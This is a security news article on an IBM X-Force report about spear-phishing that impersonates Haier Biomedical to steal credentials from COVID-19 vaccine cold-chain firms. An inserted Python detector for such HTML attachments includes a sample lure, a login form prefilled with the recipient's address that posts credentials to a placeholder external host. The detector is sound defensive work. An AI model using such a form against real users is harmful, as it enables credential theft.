Phishing Campaign Targeting COVID Vaccine 'Cold Chain' Expands
Updated Report From IBM Provides New Details
Cybercriminals, likely backed by nation-states, are expanding global spear-phishing campaigns targeting the COVID-19 vaccine "cold chain" in an attempt to steal credentials so they can gain "privileged insight" into sensitive information, the IBM Security X-Force says in an updated report.
The cold chain refers to companies involved in the delivery and storage of COVID-19 vaccines at low temperatures.
In December, the IBM Security X-Force released its original report about a phishing campaign that sought to harvest account credentials. The Cybersecurity and Infrastructure Security Agency issued an alert about that report (see: Phishing Campaign Targets COVID-19 'Cold Chain').
In an updated report issued Wednesday, IBM says it has discovered an additional 50 email message files tied to spear-phishing campaigns that targeted 44 companies in 14 countries in Europe, North America, South America, Africa and Asia that are involved in the vaccine cold chain.
"The expanded scope of precision targeting includes key organizations likely underpinning the transport, warehousing, storage and ultimate distribution of vaccines," IBM writes.
Targeting Business Leaders
The expanded spear-phishing attempts targeted CEOs, global sales officers, purchasing managers, system administrators, sales reps, HR officers, finance directors, heads of supply and logistics, heads of plant engineering, heads of marketing and export sales managers, IBM says.
"The campaign impersonates an executive from Haier Biomedical, a major Chinese biomedical company that is purported to be the world's only complete cold chain provider," IBM notes.
The phishing emails feature a request for price quotations for service contracts, IBM writes. The emails contain malicious HTML attachments that open locally, prompting recipients to enter their credentials to view the file.
The phishing messages apparently were created by someone with an "exceptional knowledge" of the cold chain, IBM reports.
"While our previous reporting featured direct targeting of supranational organizations and the energy and IT sectors across six nations, we believe this expansion to be consistent with the established attack pattern, and the campaign remains a deliberate and calculated threat."
IBM notes that the phishing emails it initially discovered were sent between Sept. 7 and 9, several months in advance of the approval of any COVID-19 vaccine, "which indicates the attacker was prepositioning in emerging global infrastructure."
Both the email subject and contents discuss requests for price quotes and make references to Haier Biomedical’s product line to store and transport vaccines, IBM says.
"The related HTML files mention organizations involved in the manufacturing of solar panels, as well as petrochemical production - dry ice as a primary byproduct - which directly aligns with the [cold storage and transport] products."
IBM says that since December, it has uncovered additional spear-phishing email samples "remarkably similar to the original samples we found." A recently found email sample was addressed to a German pharmaceutical and bioscience solutions company involved in vaccine production that appears to be a client of one of the original targets of the campaign, the updated report notes. "This context to the initial targeted email prompted further investigation."
IBM says the initial emails and the newer ones have an overlapping command-and-control infrastructure and appear to contain "the same blurred PDF" attachment with a login screen prepopulated with the user’s email address as the ID.
"Once a user ID and password are keyed in, the credentials are sent to a C2 server," IBM writes. The phishing campaign operators apparently are seeking to harvest user credentials to use in other information-gathering attacks, according to the researchers.
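The attachment pattern the report describes (a locally opened HTML file, a login form prefilled with the recipient's address, credentials posted to an external server) can be triaged statically at the mail gateway. The following is an added illustration, not code from IBM or the report; the sample attachment, its host name and the `triage_html_attachment` function are constructed for this example.

```python
"""Static triage of an e-mail HTML attachment for the credential-harvesting
pattern above: a password form, an identity field prefilled with the
recipient's address, and a submit target on an external host."""
from html.parser import HTMLParser
from urllib.parse import urlparse


class _FormScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.form_actions = []      # every <form action="..."> seen
        self.password_inputs = 0    # number of <input type="password">
        self.prefilled_ids = []     # non-empty value= on email/text inputs

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # attribute values may be None for bare flags
        if tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])
        elif tag == "input":
            kind = (a.get("type") or "text").lower()
            if kind == "password":
                self.password_inputs += 1
            elif kind in ("email", "text") and a.get("value"):
                self.prefilled_ids.append(a["value"])


def triage_html_attachment(html, recipient):
    """Return (suspicious, reasons); recipient is the delivery address."""
    s = _FormScanner()
    s.feed(html)
    reasons = []
    if s.password_inputs:
        reasons.append("password field inside a locally opened attachment")
    if recipient and any(v.lower() == recipient.lower() for v in s.prefilled_ids):
        reasons.append("identity field prefilled with the recipient address")
    external = [u for u in s.form_actions if urlparse(u).scheme in ("http", "https")]
    if external:
        hosts = ", ".join(urlparse(u).netloc for u in external)
        reasons.append("form submits to external host(s): " + hosts)
    # The reported lure needs both a credential form and an off-host target.
    suspicious = bool(s.password_inputs and external)
    return suspicious, reasons


# Constructed sample attachment; the host is a placeholder, not an IoC.
SAMPLE = """<html><body><h3>Document is protected</h3>
<form method="post" action="https://collector.example.invalid/login">
  <input type="email" name="id" value="buyer@example.com" readonly>
  <input type="password" name="pw">
  <input type="submit" value="View">
</form></body></html>"""

if __name__ == "__main__":
    print(triage_html_attachment(SAMPLE, "buyer@example.com"))
```

A benign attachment without a form yields no reasons, so the check can run on every HTML attachment without generating noise on ordinary quotations.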
The most targeted industries in the cold supply chain phishing campaign are transportation, healthcare, IT and electronics, IBM notes. But other targets appear to be associated with government organizations as well as refrigeration and metal manufacturing technology.
Seeking 'Privileged Insight'
IBM says that attackers could be looking to infiltrate the extended COVID vaccine supply chain to gain "privileged insight" into key topics. Those include negotiations surrounding the national procurement of vaccines; key timetables for distribution, including expedited passage of COVID-19 vaccines through various nations and territories; export controls and international property rights; and government measures taken to facilitate the time-sensitive cargo including pre-arrival processing.
Other information attackers might be trying to access includes collection or duplication of electronic submission of documents for pre-arrival processing; trade facilitation agreements, clearance for transport crews and security of the cargo, border crossing regulations and physical inspections; and key technical requirements surrounding warehousing and energy/electrical component requirements for maintaining temperature-controlled environments during vaccine storage, IBM says.
"While clear attribution remains presently unavailable, the rise of ‘vaccine nationalism’ and increased global competition surrounding access to vaccines suggests the higher likelihood of a nation-state operation," IBM writes.
"The fact that vaccine supply chains are being specifically targeted is not at all surprising," says Brett Callow, a threat analyst with the security firm Emsisoft.
"Disrupting the distribution of vaccines - and delaying getting them into people’s arms - could potentially provide the criminals with an enormous payday. Unfortunately, it could also result in the loss of life."
Melissa Frydrych, an IBM Security X-Force threat hunt researcher and a co-author of the report, says all companies involved in the cold chain should stay vigilant.
"Now is the time to scrutinize everything from your partners," she says. "Pick up the phone and call them to confirm emails or unsolicited attachments are really from them."